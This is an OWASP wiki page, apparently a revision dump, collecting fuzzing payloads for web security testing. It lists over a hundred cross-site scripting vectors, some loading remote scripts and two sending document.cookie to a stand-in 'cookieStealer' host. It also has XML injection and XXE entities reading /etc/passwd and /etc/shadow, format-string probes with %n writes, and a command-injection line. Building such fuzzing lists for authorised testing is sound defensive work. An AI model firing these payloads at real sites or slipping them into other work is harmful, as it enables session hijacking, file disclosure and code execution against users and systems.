';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; <br />
'';!--"&lt;XSS&gt;=&amp;{()}<br />
</pre> <br />
<br />
Common exploit code <br />
<pre># Best Statements (July 2007)<br />
# Statements covering 90% of all vulnerabilities <br />
# Florian Roth @4nc4p<br />
<br />
'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='<br />
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="<br />
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
Full List - (Update: 11 August 2009 - Total Statements: 162) <br />
<pre># Full List (July 2007)<br />
# All Statements - Full List <br />
# Based on the XSS cheat sheet <br />
# http://ha.ckers.org/xss.html<br />
# Florian Roth @4nc4p<br />
<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"<br />
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;<br />
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"<br />
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"<br />
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
"&lt;IMG SRC=""jav"<br />
"ascript:alert('XSS');""&gt;"<br />
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"<br />
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"<br />
"&lt;IMG SRC="" &amp;#14; javascript:alert('XSS');""&gt;"<br />
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"<br />
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;<br />
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS')"""<br />
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;<br />
"\"";alert('XSS');//"<br />
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"<br />
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
&lt;BODY ONLOAD=alert('XSS')&gt;<br />
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"<br />
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"<br />
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;<br />
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"<br />
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"<br />
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"<br />
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"<br />
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"<br />
¼script¾alert(¢XSS¢)¼/script¾<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"<br />
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"<br />
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"<br />
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"<br />
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"<br />
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"<br />
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"<br />
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"<br />
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"<br />
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"<br />
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"<br />
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;<br />
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"<br />
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"<br />
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;<br />
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"<br />
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"<br />
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"<br />
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"<br />
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"<br />
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"<br />
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""h\ntt\tp://6"<br />
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;{document.write(""XSS-XSS-XSS"");};"<br />
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"<br />
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"<br />
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;div style=""behaviour: url([link to code]);""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt;"<br />
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"<br />
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"<br />
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"<br />
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"<br />
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"<br />
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"<br />
&gt;&lt;script&gt;<br />
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"<br />
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"<br />
&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;<br />
"%3cscript%3ealert(""WXSS"");%3c/script%3e"<br />
%3cscript%3ealert(document.cookie);%3c%2fscript%3e<br />
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E<br />
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;<br />
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert<br />
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;<br />
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""<br />
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;<br />
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;<br />
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"<br />
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG%20SRC='javasc<br />
"&lt;IMG%20SRC=""jav"<br />
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"<br />
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"<br />
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;<br />
&lt;IMG%20SRC=javascript:alert('XSS')&gt;<br />
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E<br />
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;<br />
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}<br />
'';!--&lt;XSS&gt;=&amp;{()}"<br />
</pre> <br />
<br><br />
<br />
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===<br />
<pre>Statements<br />
count(/child::node())<br />
x' or name()='username' or 'x'='y<br />
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;<br />
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;<br />
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"<br />
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
</pre> <br />
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===<br />
<pre><br />
# Full List<br />
# Format String tests to determine errors in variable handling<br />
# Florian Roth @4nc4p<br />
<br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;<br />
</pre> <br />
==== Project Contributor ====<br />
<br />
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] <br />
<br />
Reviewer: [[:User:eneves|'''Eduardo Neves''']] <br />
<br />
Contributor: [[:User:Ulisses_Castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] <br />
<br />
==== Feedback and Participation ====<br />
<br />
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org <br />
<br />
==== Project Identification ====<br />
<br />
{{Template:OWASP Project Identification Tab<br />
| project_name = OWASP Fuzzing Code Database<br />
| project_description = <br />
| leader_name = Wagner Elias<br />
| leader_email = <br />
| leader_username = Wagner.elias<br />
| maintainer_name = <br />
| maintainer_email = <br />
| maintainer_username = <br />
| contributor_name1 = <br />
| contributor_email1 = <br />
| contributor_username1 = <br />
| contributor_name2 = <br />
| contributor_email2 = <br />
| contributor_username2 = <br />
| contributor_name3 = <br />
| contributor_email3 = <br />
| contributor_username3 = <br />
| contributor_name4 = <br />
| contributor_email4 = <br />
| contributor_username4 = <br />
| contributor_name5 = <br />
| contributor_email5 = <br />
| contributor_username5 = <br />
| contributor_name6 = <br />
| contributor_email6 = <br />
| contributor_username6 = <br />
| contributor_name7 = <br />
| contributor_email7 = <br />
| contributor_username7 = <br />
| contributor_name8 = <br />
| contributor_email8 = <br />
| contributor_username8 = <br />
| contributor_name9 = <br />
| contributor_email9 = <br />
| contributor_username9 = <br />
| contributor_name10 = <br />
| contributor_email10 = <br />
| contributor_username10 = <br />
| pamphlet_link = <br />
| mailing_list_name = owasp-fuzzing-code-database<br />
| links_url1 = <br />
| links_name1 = <br />
| links_url2 = <br />
| links_name2 = <br />
| links_url3 = <br />
| links_name3 = <br />
| links_url4 = <br />
| links_name4 = <br />
| links_url5 = <br />
| links_name5 = <br />
| links_url6 = <br />
| links_name6 = <br />
| links_url7 = <br />
| links_name7 = <br />
| links_url8 = <br />
| links_name8 = <br />
| links_url9 = <br />
| links_name9 = <br />
| links_url10 = <br />
| links_name10 = <br />
| project_road_map =<br />
| project_health_status = <br />
| current_release_name = <br />
| current_release_date = <br />
| current_release_download_link = <br />
| current_release_rating = <br />
| current_release_leader_name = <br />
| current_release_leader_email = <br />
| current_release_leader_username = <br />
| last_reviewed_release_name = <br />
| last_reviewed_release_date = <br />
| last_reviewed_release_download_link = <br />
| last_reviewed_release_rating = <br />
| last_reviewed_release_leader_name = <br />
| last_reviewed_release_leader_email = <br />
| last_reviewed_release_leader_username = <br />
| old_release_name1 = <br />
| old_release_date1 = <br />
| old_release_download_link1 = <br />
| old_release_name2 = <br />
| old_release_date2 = <br />
| old_release_download_link2 = <br />
| old_release_name3 = <br />
| old_release_date3 = <br />
| old_release_download_link3 = <br />
| old_release_name4 = <br />
| old_release_date4 = <br />
| old_release_download_link4 = <br />
| old_release_name5 = <br />
| old_release_date5 = <br />
| old_release_download_link5 = <br />
}} __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=80304
Category:OWASP Fuzzing Code Database
2010-03-22T17:17:17Z
<p>Foobar23: /* SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) */ - marked my contribution</p>
<hr />
<div>This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. <br />
<br />
==== News ====<br />
<br />
'''17 March 2010'''<br />
<br />
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)<br />
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)<br />
